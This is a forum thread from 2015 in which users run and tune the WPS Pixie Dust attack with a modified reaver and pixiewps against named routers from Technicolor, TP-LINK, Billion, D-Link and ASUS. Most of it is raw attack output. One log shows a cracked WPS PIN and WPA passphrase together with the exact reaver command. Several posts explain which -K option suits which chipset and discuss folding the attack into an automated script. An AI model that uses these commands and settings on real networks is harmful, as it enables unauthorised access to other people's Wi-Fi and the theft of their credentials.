However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

So I want to know who could perform this exploit, and how (with full description if possible) ?

There is also a TD5130 v3 that I'd love to test it on and share with you all.

Thank You !

t6_x
2015-04-17, 21:28
It would be interesting you put the output of reaver.

So we can see what chipset is and other information

Extradry
2015-04-17, 23:58
Hi All

A couple more for the database

Technicolor TG-797N v3 Not Vulneruable




XX:XX:XX:XX:XX:XX| 6|-70|1.0|No |Telstra9F72A5| Technicolor| 797n v3

OUI: 00-10-18 (Broadcom)

[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 41:59:b6:83:3c:ce:53:58:e8:55:5d:b2:2c:b2:87:e7
[P] PKE: 1c:8d:16:a1:5f:08:c2:f0:07:67:b3:24:c9:26:73:c2:ff :b5:c0:3b:39:96:fd:38:b1:d6:de:b7:81:15:63:cb:43:a f:f8:21:4f:1d:47:3b:d8:71:e8:17:f6:49:f6:00:31:1c: 95:ed:df:76:77:63:48:2b:82:95:e2:b0:bc:c4:41:2c:b5 :2b:95:a6:3d:65:3f:3b:11:5d:81:92:2a:9b:65:a2:61:8 6:39:c7:d0:e0:3d:4c:c9:84:5c:78:b7:87:57:e9:9f:b1: 46:97:ca:e0:b6:d2:c7:30:97:7c:a6:36:d6:97:39:fc:93 :be:b8:c6:dd:d6:cb:59:b3:b5:e5:0a:94:0b:4a:0c:a8:1 5:ae:8d:95:dc:f0:95:63:5d:57:2d:34:d6:1d:b9:9e:3e: 77:d5:be:c1:1f:a3:3d:55:b8:2b:6d:02:60:a0:a6:44:89 :78:e4:a8:a4:56:f8:ee:5b:cb:5f:97:2e:62:a3:0d:21:e 3:6a:75:ef:40:d0:db:39:4f
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: 797n v3
[P] WPS Model Serial Number: 1426SARZR
[+] Received M1 message
[P] PKR: 1d:4d:69:d6:76:ac:8d:6f:9e:d7:7a:3a:4a:0b:d7:38:91 :fe:e4:76:99:dc:de:95:70:0f:76:8e:cf:f0:ae:9d:61:2 1:2e:9e:a2:49:a6:38:ce:84:bf:8c:24:d1:6e:67:27:9c: 8c:5f:14:0b:80:f2:52:aa:81:ed:f9:b7:c4:93:4e:fb:c7 :6c:fd:16:5d:81:d8:5d:73:c2:72:1f:9d:54:3d:a0:33:c c:83:61:e1:22:9c:4a:8d:61:d1:19:87:78:7c:ea:0e:83: 1f:33:bc:a4:07:e2:a0:0a:ad:69:6b:e8:13:ca:6f:0d:d6 :c5:6c:0f:0d:03:b2:4b:7c:77:22:30:c6:60:70:2d:9a:c 6:fb:dc:fc:ac:6a:83:60:a0:78:e2:65:c1:53:e7:d3:c6: 0c:14:75:98:83:ec:c4:6b:ff:ad:c3:4f:bc:87:d4:27:d5 :6c:6d:77:d0:c6:9f:10:1d:46:54:94:6a:9e:8a:47:f0:2 a:f9:e3:49:e0:93:a3:cf:99
[P] AuthKey: e0:9a:70:98:e9:02:e6:35:de:9f:51:76:8a:bb:79:5d:c2 :7e:86:55:bf:bb:ad:d6:c1:59:f6:72:ea:e1:eb:66
[+] Sending M2 message
[P] E-Hash1: d5:ae:2b:a4:98:12:42:08:3a:0e:7a:a2:20:b0:38:c2:92 :cc:d2:89:e1:e5:d2:06:26:78:94:bd:7d:d2:70:8a
[P] E-Hash2: f5:92:52:dc:5a:67:0a:d6:c7:b4:86:b6:7b:72:19:c9:42 :f7:6f:47:cc:38:5b:3c:b5:25:74:1a:43:99:75:0c
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]

TP-LINK TD-W8960N Not Vulneruable


XX:XX:XX:XX:XX:XX|11|-51|1.0|No |TP-LINK_48FD412| TP-LINK| 12345690

OUI: 00-10-18 (Broadcom)

Device Name: TD-W8960N


[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5a:07:59:bb:b9:6a:14:bf:3a:ed:0b:50:5b:2d:8d:d2
[P] PKE: 7f:1f:e6:78:73:18:20:fc:f8:a4:1c:dd:b6:6f:2f:a4:fb :19:2e:45:45:9a:3c:21:4b:ca:b3:ef:74:25:af:c2:a5:7 7:f0:da:a6:bc:7b:30:9a:24:36:d6:8c:e6:70:dd:fc:3f: 53:2d:ba:f5:35:97:5c:04:c8:96:a7:37:f5:c7:0a:3d:40 :74:c5:18:c3:a3:6a:c0:bb:92:e2:98:85:79:46:51:e5:0 1:0f:fc:9f:3f:70:42:9f:6c:4f:3f:8f:58:bb:2f:b8:48: e5:41:64:82:ea:49:c5:80:8b:60:71:0c:31:e8:d6:30:5a :d7:e5:f8:60:02:e0:9b:c8:e0:19:5b:23:61:ff:8f:47:5 d:e2:94:9f:20:a2:5e:3d:25:6d:4f:6f:93:9b:32:c9:b4: 12:4b:a9:7f:80:69:f8:48:8c:eb:a3:5d:25:94:3f:19:67 :91:e1:96:aa:1e:1b:49:37:46:45:39:6a:a2:17:db:7a:1 c:6b:34:94:db:64:bd:f5:18
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 123456
[P] WPS Model Serial Number: 1234
[+] Received M1 message
[P] PKR: 95:2b:f1:10:06:77:c0:86:a1:ed:4e:72:1b:86:ab:a0:0f :0f:cd:53:36:31:8f:6b:7e:24:15:19:15:6e:b5:35:c3:f 8:8b:0c:11:52:59:79:70:0c:20:5d:36:ca:8a:49:a7:28: 19:55:71:c3:69:a5:49:b9:f5:6c:8a:6b:91:6f:79:a3:35 :77:59:86:2e:8b:92:f6:d6:e2:b1:c5:72:c9:bd:96:8e:5 5:5c:48:c5:9c:71:68:77:1f:2e:d0:79:f1:46:c3:f6:98: 5c:32:a8:01:f2:f4:71:d3:52:82:67:0c:85:58:b5:eb:f5 :5d:a0:61:47:b3:91:1b:b8:1c:2f:b8:90:b3:ec:cd:9c:2 8:f3:1f:26:d0:5a:7e:1d:65:ca:f0:d1:1d:e2:ce:a3:9a: 02:65:8d:15:85:07:30:20:dc:d3:6c:04:de:a4:23:b3:ec :72:bc:13:a6:60:cd:d0:72:98:fd:53:35:ff:6e:d5:6c:6 0:45:ba:75:7a:3c:ff:a0:4e
[P] AuthKey: 96:60:ce:20:f5:dd:07:56:0c:71:21:e7:bf:6a:34:5b:97 :4c:2a:80:23:bf:48:5b:d5:28:cf:51:2d:32:a6:0b
[+] Sending M2 message
[P] E-Hash1: d6:b8:56:b3:22:cb:8e:b1:15:c6:3c:b8:a4:21:99:4c:ff :a2:fb:88:d7:47:21:73:3f:2b:0c:fd:92:be:92:5a
[P] E-Hash2: 96:bc:4e:e2:e1:14:a5:ea:8e:a3:65:03:66:f0:ef:d6:6f :ea:c9:9c:ee:60:07:dc:be:e0:63:c2:67:1c:8d:ea
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]



Billion 7800N Vulnerable

XX:XX:XX:XX:XX:XX| 1|-40|1.0|No |Corona| http://www.billion.com.au| 1.0

OUI: 00-0c-43 (RalinkTe)

RT2880iNIC

[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 4b:65:ca:9d:f1:f3:8c:76:3a:ab:b7:42:8a:92:2f:b5
[P] PKE: fd:a7:c9:c0:d9:4c:7e:fd:24:ea:5a:ec:64:e2:f1:d5:aa :f6:75:e8:f8:7f:70:a3:e9:97:5f:6c:a3:92:60:42:34:d c:ae:63:d1:ef:99:61:26:46:23:aa:26:95:61:4a:df:91: 63:f9:77:fe:0e:a6:17:d2:2e:d1:39:27:d2:78:03:50:8f :06:7b:74:c6:08:af:11:0b:17:4e:75:db:52:b9:56:40:3 8:90:6a:d2:c0:69:af:d3:22:9e:45:b2:f3:fe:6f:b2:74: 2b:c3:93:b3:e6:9d:74:57:5f:f0:7a:0d:ad:34:0d:47:b7 :72:2b:5d:0d:b2:d1:7b:d3:6e:24:a8:dc:f8:e1:84:f8:a 8:65:bf:96:5a:7c:ee:4e:3e:09:80:c4:c1:07:92:1a:06: 83:bb:f2:64:e3:f9:06:39:b5:c3:23:9c:7a:4f:a3:56:3a :2c:56:83:1b:fe:c2:da:35:69:06:45:d4:5a:f1:6e:25:2 4:86:f2:db:3b:0a:0a:b7:21
[P] WPS Manufacturer: http://www.billion.com.au
[P] WPS Model Number: 1.0
[P] WPS Model Serial Number: 12345678
[+] Received M1 message
[P] PKR: a7:b1:8c:7c:db:7e:28:fb:8a:27:9f:e9:ff:93:12:9d:ae :6b:89:ea:65:54:c2:2b:a2:0a:7b:d7:ee:57:ec:76:71:f 5:5f:32:a4:94:ce:53:82:0c:9e:95:e7:e7:69:18:da:0d: f0:f2:ec:ba:b3:bd:21:bc:d3:98:ac:86:e8:1a:b3:09:e7 :db:23:e3:ed:e2:d6:e7:ec:aa:da:53:45:60:78:98:78:7 d:0d:09:5b:58:32:1b:8a:3a:96:b9:52:b0:0c:e3:ec:ee: db:92:cf:bf:0f:87:d5:84:ce:3a:73:28:a4:90:99:f5:3c :67:c6:1e:9c:06:35:fa:07:ed:15:f5:a1:fe:29:b3:ab:e d:50:86:74:30:11:97:a6:17:e7:5e:f7:72:1f:4f:bf:30: 20:43:0f:bc:88:53:1a:fc:e0:db:96:3a:f6:66:1d:d1:31 :c7:4a:44:a1:f1:d5:05:a0:80:c7:22:bd:29:e0:ed:b8:d d:80:be:70:ea:ff:a4:3c:47
[P] AuthKey: 4c:23:09:ed:5f:b8:15:15:1e:61:b6:99:46:53:d7:2b:9c :85:13:28:80:55:b7:b5:e5:6e:bd:cc:35:99:c5:85
[+] Sending M2 message
[P] E-Hash1: e6:87:2c:1f:b0:60:de:3f:65:8a:4b:02:30:36:1e:da:b3 :0e:58:ee:54:db:bc:d0:72:61:55:de:39:5f:a9:bb
[P] E-Hash2: e8:c0:54:54:fa:f8:e1:ef:ad:ed:5b:90:81:60:af:6f:53 :c5:74:2d:ba:aa:6c:28:28:e6:a5:fa:8c:78:fe:ec
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 91:5a:dd:fd:ef:ce:21:83:97:a9:13:ef:ed:94:5a:cf
[Pixie-Dust] PSK2: 91:e6:ab:f1:08:66:bf:56:3e:df:3a:df:67:5a:de:90
[Pixie-Dust] [+] WPS pin: 48606684
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -s y -p 48606684

[Reaver Test] BSSID: XX:XX:XX:XX:XX:XX
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '48606684'
[Reaver Test] [+] WPA PSK: 'Routersecurityflawed'
[Reaver Test] [+] AP SSID: 'Corona'


Excellent work on the mods to reaver and the pixie wps

Cheers
Extra

soxrok2212
2015-04-18, 01:04
Hello Everyone !

I want first to congratulate you about the great steps you did through this Pixie Dust Exploit.

Also, I have noticed that today, on the WPS Pixie Dust Database (https://docs.google.com/spreadsheets/d/1tSlbqVQ59kGn8hgmwcPTHUECQ3o9YhXR91A_p7Nnj5Y/edit#gid=2048815923) , the router Technicolor TD5130 is being said as Vulnerable.

However, I have tested Pixie (1.0.5) on both of my router versions (v1 & v2), but always unsuccessfully. I also tested this through PixieScript 2.4, but I still get "WPS Pin not found".

So I want to know who could perform this exploit, and how (with full description if possible) ?

There is also a TD5130 v3 that I'd love to test it on and share with you all.

Thank You !

The Realtek implementation is unfinished as of right now, 4/17/15. It ONLY works if the whole entire WPS exchange occurs within 1 second (here, E-S1 = E-S2 = E-Nonce). Wiire is currently working on the PRNG brute force and it shouldn't be too long that it is finished. In the meantime, I suggest you wait and don't try to attack it again so you don't get locked out. ;) If you want, you can send me all the keys/info and I'll look into it more :)

slim76
2015-04-18, 01:26
Very very very nice work guys, guess theres no stopping progress. :-)

Would anyone mind if I added the pixie dust attack into FrankenScript?.

Quest
2015-04-18, 02:17
... guess theres no stopping progress... hey that's my line!!! :mad:


Would anyone mind if I added the pixie dust attack into FrankenScript?. I don't :p

Jynn
2015-04-18, 07:53
It would be interesting you put the output of reaver.

So we can see what chipset is and other information


I hope the following output of the tests of 3 routers is useful :

root@kali64:~# reaver -i mon0 -b 5C:D9:98:33:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 5C:D9:98:33:xx:xx
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Associated with 5C:D9:98:33:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: fc:09:f4:f8:14:f7:d8:6a:e0:1f:45:af:39:c7:0f:ad
[P] PKE: 85:84:7e:84:11:31:2e:77:e4:1b:da:ca:e5:be:c5:7f:1f :66:b5:e8:5f:21:f9:54:87:4f:49:ab:f4:bf:2d:93:e8:1 f:f3:92:de:d5:96:0f:98:25:e5:dd:74:d5:5a:ad:85:cc: 5a:f1:9d:c3:17:02:26:89:30:50:b4:e3:43:52:51:56:27 :7a:22:c2:a2:6d:ba:4c:c5:01:2d:ca:0c:21:ac:4c:94:1 2:27:aa:d1:3d:7c:49:bc:26:46:ac:c6:d6:e4:34:50:7c: 91:fd:25:fd:30:07:09:8d:88:5f:46:b8:ed:1e:99:70:42 :1b:29:31:7c:75:9c:56:4a:75:ee:3e:2d:0e:b1:45:e0:1 a:c7:e5:b4:e7:f8:88:bf:ae:87:2e:49:10:92:06:17:94: 49:c0:5d:4c:17:87:79:4c:c8:de:01:b0:0b:24:fb:2d:bd :4c:cb:80:99:7d:b4:d4:fa:af:38:8d:92:b2:77:ac:0d:6 9:9d:58:dc:a9:31:08:98:da
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 9a:86:3f:ff:71:8d:9d:e6:53:e3:a9:d7:e0:f8:95:cf:74 :0e:7e:88:32:67:c9:d1:87:2a:6b:e3:5a:17:88:4e
[+] Sending M2 message
[P] E-Hash1: 31:a7:13:e2:68:e4:4a:6f:af:c7:04:08:6e:5d:93:62:21 :b9:8e:a3:c3:31:47:d2:44:11:49:43:ef:ae:ac:c8
[P] E-Hash2: 3c:60:ee:50:64:40:4a:16:52:73:3f:2c:34:9b:6c:7e:47 :71:9a:bc:71:b6:96:a1:3c:9b:c9:bc:14:ce:6d:76
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]


root@kali64:~# reaver -i mon0 -b 40:16:7E:5D:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[+] Waiting for beacon from 40:16:7E:5D:xx:xx
[+] Switching mon0 to channel 1
[+] Associated with 40:16:7E:5D:xx:xx (ESSID: xxxxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c3:b1:c2:3b:2a:5f:f3:35:83:c4:d2:68:16:64:d9:76
[P] PKE: ae:90:dd:03:c2:b4:b0:7f:17:5d:c9:cf:3a:d8:6b:ca:1f :24:08:20:55:a8:73:65:6f:61:b7:a3:a8:2c:00:58:fb:d 0:3d:bc:35:a6:f6:10:fc:d2:c1:70:1c:9d:5f:af:d6:ed: 3f:ab:38:ff:86:9d:f7:84:6f:22:3b:cf:1e:9f:bf:cc:a1 :74:07:a1:69:7c:71:75:4e:cf:10:d6:34:d8:3a:b4:07:5 8:50:95:70:73:53:0e:c3:0f:de:34:7d:51:05:ad:74:82: 08:c6:04:ef:f9:42:a8:29:19:0c:68:64:63:ee:77:d8:50 :b6:fb:9e:7d:87:84:86:fe:78:6e:54:15:b6:32:3c:60:9 2:1c:aa:ce:49:a7:13:09:2b:ee:a8:4c:31:d3:09:b6:11: c4:16:32:c5:b9:9e:0d:65:89:96:f1:7f:37:2f:42:75:d2 :cf:50:b6:67:70:a7:1a:28:a8:d1:e8:4a:ec:a9:26:9f:b 7:c8:ea:78:9f:ad:e3:06:a8
[P] WPS Manufacturer: ASUSTeK Computer Inc.
[P] WPS Model Number: RT-N12
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 8d:9c:e2:47:23:ac:b2:d1:f6:de:cd:d5:c1:d3:3f:41:13 :a4:e7:5c:20:3b:24:7c:f2:1a:4b:19:6f:ca:68:3b
[+] Sending M2 message
[P] E-Hash1: 6b:0f:9b:cd:c8:0e:92:78:13:6f:b8:01:f1:45:0c:3d:99 :88:60:1d:5d:69:6e:e6:55:da:44:a1:d9:61:1f:52
[P] E-Hash2: 0c:16:eb:80:24:18:f5:1a:7d:c3:11:ba:c4:1c:e6:d6:56 :81:31:c3:76:6a:52:1c:4a:c6:5e:ad:0c:51:19:7b
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]



root@kali64:~# reaver -i mon0 -b 64:70:02:5C:xx:xx -vv -K 1

Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead

Option (-K 1) or (-K 2) must use the -S option. -S Option enabled now, continuing.
[?] Restore previous session for 64:70:02:5C:xx:xx? [n/Y] n

[+] Associated with 64:70:02:5C:xx:xx (ESSID: xxxxxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: bf:1e:7d:b5:18:9e:f0:66:22:9c:5e:20:2e:43:31:6c
[P] PKE: 9d:48:eb:a8:25:6e:6b:7d:aa:f5:b9:f2:da:49:66:b9:cd :8f:b1:ab:25:16:ba:7b:df:87:71:7e:d1:e8:af:b1:71:b a:c4:96:89:d8:db:1b:57:2c:61:cc:0e:a4:c6:31:02:38: 43:50:d1:be:b1:83:49:19:3e:8c:ed:9f:55:e5:6e:a7:1a :05:c5:5f:22:e0:c4:ac:d5:5d:d6:bd:32:a8:1d:e2:6f:2 5:78:e6:9a:4d:55:f1:7b:dd:ba:ed:13:7f:33:a6:76:38: af:c2:b5:d6:10:42:eb:98:4e:f6:fe:90:dd:4d:79:d6:08 :d7:3a:0c:86:11:4d:b5:75:76:d7:4c:48:a3:00:33:97:2 c:b5:57:a3:83:1a:5c:58:94:78:53:cf:58:54:c2:1f:fa: ec:91:06:84:d9:95:2a:38:31:72:a2:cc:17:63:a0:13:a0 :9e:7d:cf:cd:14:dd:07:82:76:2c:76:7d:2d:e2:fd:4a:d 9:a2:f4:b0:b1:fc:80:18:b1
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: 08:a0:73:06:7c:1c:bf:77:d9:04:a5:14:90:8f:b6:5d:4b :d7:f5:06:7a:8d:f4:e0:25:88:ae:70:07:d8:f4:82
[+] Sending M2 message
[P] E-Hash1: 2d:55:4e:4a:17:6a:87:ac:33:ae:e4:be:f8:3c:94:f0:d9 :ee:fd:5c:a6:a8:af:96:20:8a:07:e7:5d:cd:cd:35
[P] E-Hash2: 11:f1:24:8c:37:54:fd:3c:5b:f3:b5:66:df:6a:58:e9:9c :f4:2c:9d:d5:ab:4e:36:89:bc:d8:27:9c:ac:15:7d
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]

iliass
2015-04-18, 10:32
we want please if possible give as method to add more router and thanks @soxrok2212

soxrok2212
2015-04-18, 11:29
Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

iliass
2015-04-18, 11:40
soxrok2212 ..thanks for your works ..but in routeur TD5130 and TG589 V3 d ont works ..and we want a methode you are using for put routeurs in pxiewps

slim76
2015-04-18, 12:25
@ Quest

I heard your call matey, Guess I'll be adding it to FrankenScript. :-)

slim76
2015-04-18, 12:46
Just so you know, -K 1,2,3... Each number is for a different chipset. You have to look up which chipset the router uses and then us the corresponding -K 1,2,3 argument.

Hello matey,

Any idea what -K option should be used with what chipsets?.

soxrok2212
2015-04-18, 13:08
Hello matey,

Any idea what -K option should be used with what chipsets?.

Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...



The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once


1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

nuroo
2015-04-18, 21:23
Yea. agreed. I suggested to t6_x this idea on his thread.

Just have reaver/pixie try all three attacks. User just wants the pin/passphrase quickly. Doesnt really care how. If user really wants to know which attack the AP was vulnerable to let him use --vvv.

Quest
2015-04-18, 22:19
@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

slim76
2015-04-18, 23:07
Yeah, I just send a message to t6_x, I think we will be removing those options to make it much simpler. I don't really understand it right now either but I guess I can try...



The -K option 1 run pixiewps without PKR and the e-s1 = e-s2 = 0
The -K option 2 runs pixiewps without PKR and the e-s1 = e-s2 = 0 but using the -n option of pixiewps (E-Nonce)
The -K option 3 runs pixiewps with PKE, PKR and the hash1 = hash2 = e-once


1 should be used with Ralink and -S used in reaver
2 should be used with Broadcom and -S used in reaver
3 is for Realtek and -S is NOT used in reaver (realtek isn't finished yet... it has worked for me but other users report failures)

Cheers for the info matey, its made things much clearer for me. :-)
Cheers again for all your hard work, its greatly appreciated.

soxrok2212
2015-04-18, 23:16
@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

Yeah, to be honest, I'd wait another week or two at least. Doing A LOT of work and there are still a lot of bugs to be ironed out. Anyways, I was thinking about starting a giant group-dev chat on Skype...? It would make communication a lot faster and info could be shared much much quicker. If you want to add me, my Skype is robert.jor49. I'm already in contact with a few of you guys, but theres still a few of you who are not there.

slim76
2015-04-18, 23:19
@ Slim, great but don't move too quick, this is still in dev with improvements on the horizon, and the next Kali might be using different programs(?) like another Aircrack-ng https://bugs.kali.org/view.php?id=2219 for example. That might change a thing or two or maybe not.

Anyways good to see you back and a new Franken looming [thumb up emoticon here]

I thought things would change a little, it shouldn't be much of an issue, worse case I'll have to rewrite the pixie attack in FrankenScript.
I'm hoping to upload a tempory version of FrankenScript within the next few days if all goes well.

Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.

soxrok2212
2015-04-18, 23:31
Is it worth getting FrankenScript to print out the results of the pixie dust attacks with the Pin & Passphrase?, or should it just print the Pin & Passphrase?.

Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver. ;)

slim76
2015-04-18, 23:33
I just noticed something about the install of pixwps, the install directory is different for different install methods.

apt-get installs pixiewps to: usr/bin
make & make install installs pixiewps to: /usr/local/bin

Does anyone know if reaver-wps-fork-t6x & reaver from the kali repo will detect pixiewps in either/both locations?

slim76
2015-04-18, 23:37
Uhhhhh... what? Do you mean pixiewps's pin and then reaver's output? -- If so, just have it print the pin and passphrase from reaver. ;)

Sorry I mean't details like the PKR, PKE, EHash, chipset and such.

soxrok2212
2015-04-18, 23:47
Sorry I mean't details like the PKR, PKE, EHash, chipset and such.

Oh. Chipset/Model number/Manufacturer yes, the rest, no... just in case they want to report their findings :)

patter1
2015-04-19, 06:00
Hello
This site is in German. I hope this site helps with DLINK and Speedport.
https://www.wardriving-forum.de/wiki/Standardpasswörter

someone_else
2015-04-19, 22:20
Some new Signatures (tested with all 4 possible pixiewps option-combinations)

NOT VULNERABLE:


ASUS RT-N66U
Broadcom BCM4706

[P] E-Nonce: 01:5a:54:01:c1:db:32:e5:2b:33:fd:bb:8c:9d:f0:9e
[P] PKE: 8c:09:51:62:1f:45:31:98:32:a0:fc:58:0e:d5:ed:36:86 :c4:b5:ab:7c:8c:c7:30:67:40:a9:ff:e7:62:8f:9b:7d:1 c:31:d4:95:96:ce:ea:5b:b3:43:ba:d2:f7:12:8d:8e:48: 01:fd:8c:0c:12:17:53:e7:aa:29:9b:9a:06:31:4f:73:e5 :78:cc:b8:7e:99:26:1d:be:db:cb:69:45:f3:19:21:df:a b:cd:91:b5:d7:94:7d:83:b9:9e:b8:b5:55:61:ac:c2:78: 17:f5:92:01:d4:a6:ed:fe:82:2f:83:23:87:05:5d:69:18 :97:9e:c6:6f:34:cb:02:e2:a0:51:d1:18:24:c3:cc:7c:d 7:ab:80:93:95:b6:48:ea:92:53:5a:96:6a:f9:4d:3e:a5: 07:6d:4f:6a:20:cd:bf:5b:e0:b5:dc:b2:f1:55:17:43:7b :2c:26:0a:d2:05:ba:3a:87:da:dd:63:5c:5d:27:f7:84:4 d:47:4a:b2:59:6a:3e:43:9b
